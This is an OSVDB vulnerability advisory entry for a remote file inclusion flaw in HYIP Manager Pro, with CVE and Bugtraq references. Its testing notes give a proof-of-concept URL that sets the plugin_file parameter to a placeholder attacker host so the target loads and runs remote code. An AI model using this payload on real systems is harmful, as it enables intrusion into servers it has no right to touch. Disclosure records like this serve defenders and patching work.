HYIP Manager Pro /inc/libs/core/core.read_cache_file.php plugin_file Variable Remote File Inclusion

2007-04-25T19:58:23
ID OSVDB:35560
Type osvdb
Reporter OSVDB
Modified 2007-04-25T19:58:23

Description

Manual Testing Notes

http://[target]/inc/libs/core/core.read_cache_file.php?plugin_file=http://[attacker]/?

References:

Related OSVDB ID: 35554 Related OSVDB ID: 35555 Related OSVDB ID: 35558 Related OSVDB ID: 35553 Related OSVDB ID: 35556 Related OSVDB ID: 35557 Related OSVDB ID: 35559 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0426.html ISS X-Force ID: 33882 CVE-2007-2326 Bugtraq ID: 23663